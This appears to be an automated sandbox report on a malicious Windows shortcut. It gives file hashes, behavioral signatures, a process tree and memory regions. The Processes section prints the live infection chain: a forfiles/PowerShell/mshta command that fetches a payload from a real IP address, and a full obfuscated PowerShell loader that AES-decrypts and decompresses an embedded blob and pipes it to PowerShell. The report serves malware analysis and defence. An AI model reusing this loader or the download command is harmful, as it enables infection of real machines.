SHA512 a6381f3b0d3184ab098e9a40ca65dd1cec76cb7e0cfe13a5c2d188e4c8e6d077286c70a366ad6ffc7e7f68faa6240a730b7034fcaa00d1c1f0922e42c1edb8fc

C:\Users\Admin\AppData\Local\Temp\main\extracted\nmYIeCI7gcMH.exe

MD5 a2599048150532ff6fe252cef66a0a9a
SHA1 ae368eae4650fd3c75cfb4dbb0a53cd5331201bb
SHA256 92f7cdf850de1f4b8fb7b96298f3dba0a590f80fd46020a08f710176c6ef5ba0
SHA512 d6e4fa7c000ad4dcbe66d533a02cf5c1ff7d9410d14456b2c13df5506c3a05784bafb0e3aad2aeb35eafced1009be044654c41ea3d6cd9bdffe05821774f58a9

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 4fe97b925beae6dff3e2685a3b51d367
SHA1 344297bda2f1fc7d62d6640ce9515f49600cfa7c
SHA256 1e8949b7e730e67a269cf60a8580af9929badabc36d82844e8edea4c00cfac47
SHA512 f4e4f00bc66cc3ce54aa5374a265a5efaf307757e9d2684da4b8ba2bde094abc17ef6f1ffc085ee9c8be8e61219ec2a3f69d7cc40ed50407047f0d7c5cc8930d

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 52a996010e0bf508e3f42a33d551a184
SHA1 2dae988471bfe7598a981b997bf77eae59013fc1
SHA256 3ce93351d9de6756ce9ff59d7830e905d9bee98f599107c0bdeb6374a47a84cb
SHA512 74863d2b2abc30027ad7ee63cf518222d8934e4bc03312215b58d0921c180ff6416011c83ab5083855ec4cb1da395018e3d245c54ba6cc238b462cefc26e3787

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

MD5 763cb011f068f184a672e254d3ce3c39
SHA1 59eb148e6ad321cac5396e6a58c1528f7932befb
SHA256 d25782f4a9573c40747458b6916e9332b34a349b3011ec85dd5d11a583a87105
SHA512 530b8c0ad90b53f38cd56ffaf3766f33167c9922e55f8485ca87019275730c94dd6a84a1d9578163c45bae2743cf6981041f9ccc97ceb822f8d607f94a0c1d28

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 314c9eecec4e702f04cd34bf423cd24f
SHA1 23a24e0b875ebfe52062a85d5b5d4014ccef3c0b
SHA256 c89c70f478a37253b0c7d363aafab4306b408a9f0a57432a788f763ba5c76880
SHA512 ba005a5176611b9152016462eac733fd4b078ab1fe6823193ef8dcfbe3fb3b56243b67a1fa9beeff75f22263c6792cd6c1cc7af63a7feb39e1bdada4c922a2d5

C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe

MD5 fe044a66ff6ed6c1fa522a53af2ca535
SHA1 78d7b327b5c0f0e93a2b4d6eae692aff4a50891b
SHA256 71d81eec84ec62a6f977f50f5cd5db6e50f52675d2d1407db8412f1edf2721ab
SHA512 ac2eda0d82979b812bfbdf6e61b88e88b3309edefb78690f3632a9e8967d9193beaf3147cf734756b84e5206b06b20f7ce48a236dd1e9ab8d2660e81c1ded2fc

memory/628-135-0x0000000001200000-0x0000000001300000-memory.dmp

memory/1728-136-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1728-142-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1728-143-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1728-144-0x0000000000400000-0x000000000040A000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-05 02:01

Reported

2024-03-05 02:03

Platform

win7-20240220-en

Max time kernel

120s

Max time network

120s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2868 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 2868 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 2868 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 2608 wrote to memory of 2468 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2468 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2468 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2468 wrote to memory of 2264 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 2468 wrote to memory of 2264 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 2468 wrote to memory of 2264 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 2264 wrote to memory of 2548 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2264 wrote to memory of 2548 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2264 wrote to memory of 2548 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2548 wrote to memory of 2080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2548 wrote to memory of 2080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2548 wrote to memory of 2080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk

C:\Windows\System32\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

start mshta http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = 'AAAAAAAAAAAAAAAAAAAAAHuMmso1AMeYPTqg2zmFYGLRAevBF0dzIBqwjcA2oQ2m8+KngkChOWPmpzxbUmz9iES2+wmHBDF4NNikX/9SA+8RZl3cvQDF00jQ0YmFtDKSgyA9b4/phWWKAp1Dd8/ytR6dOWK+gl5jA/RW80HrzF8zwxTzeNjzEdYIbAKbgIvUzpdq1PfpNgSDcrLwnf6wYoWXaDo+4f2SPpaJvd5bWGTy1EJj8FAnhAlSK/pbposi/hrdUPIRQvxHXKQQXZlr5NrPpLbhHHu78ydc6wwTCvZk77DaGi39y5qB230ZYk/e7tV27V3q01tqCxdx3tBcSKA7uAMyX8Ey/mjlsAOXbJ57iEolFiQtMkeLXRQnHlGQAom0cfG+TD7Cm01qvC5pMEeNJbLbciSdu9xs9T+c7tPx+xBYuPOvZFzYMN57JaeaZXehvSTkRY2hC6KnLkyRSwtTIKg1U8Ib7rr08szQWfdMaxRKVj3PGI/wQuxJ+WJA8tcTFqvoG6e88+mNmfdwt98gTMZWjCMtvnf4CBc92ueyM5vs56/2u+UVEJzepZUpK8lTTQTWjY1hlOFe0emGmyht+KS1zFSwWZBbRyNt0o5Dy9xG4GYyKw+ZUF5kF4SxYX6Yv7NLLkRJ1zA1vynUhhQD0GSeGUgNQ+quSJnyFSiEdpEa8NFWaep0COP5xyMiCOqi/EypECYLwCKEOwNqBqZ0/BjRXs3On8DJzDn994w83i+XNhIcnKswDJ1rV9Alxlwmt19nbz+Dn58l/ZcLWwvS6I+mTp8UBEk0CSxgzPNb8mX3rVtEvxZVuhLJa7/XWLcWSIGEtaXWpgRM/SbMXkdj7MO7V+BRMP1qf/dcU/TUhY1lotTnnHCHRFeLb1d1';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

Network

Country Destination Domain Proto
NL 91.92.251.35:80 91.92.251.35 tcp

Files

memory/2468-40-0x000000001B760000-0x000000001BA42000-memory.dmp

memory/2468-41-0x0000000001D90000-0x0000000001D98000-memory.dmp

memory/2468-43-0x0000000002924000-0x0000000002927000-memory.dmp

memory/2468-42-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

memory/2468-45-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

memory/2468-44-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/2468-46-0x0000000002920000-0x00000000029A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 e7e999130df882fd5027d857b21f2526
SHA1 c100ff6c70e3e8be70c2045aa4ba1bc3834006ed
SHA256 7d9ff825b357ce14f5a689ff8b99e6b92457296a83de2e0f01c6070909433af7
SHA512 9591541885a94e97d36c693fe49a64c6be315e9d45eb46350bd5e1e482dcc8d14159f8f6175ef1ed87c81f686b938fa354f2b83b82c34f0c29197fd8dbd7c6ac

memory/2548-54-0x000000001B590000-0x000000001B872000-memory.dmp

memory/2548-57-0x0000000002810000-0x0000000002818000-memory.dmp

memory/2548-56-0x00000000028E0000-0x0000000002960000-memory.dmp

memory/2548-55-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp

memory/2548-58-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp

memory/2548-61-0x00000000028E0000-0x0000000002960000-memory.dmp

memory/2548-60-0x00000000028E0000-0x0000000002960000-memory.dmp

memory/2548-59-0x00000000028E0000-0x0000000002960000-memory.dmp

memory/2080-67-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp

memory/2080-68-0x0000000002B80000-0x0000000002C00000-memory.dmp

memory/2080-70-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp

memory/2080-71-0x0000000002B84000-0x0000000002B87000-memory.dmp

memory/2080-69-0x0000000002B8B000-0x0000000002BF2000-memory.dmp

memory/2080-72-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp

memory/2548-73-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp

memory/2468-74-0x0000000002920000-0x00000000029A0000-memory.dmp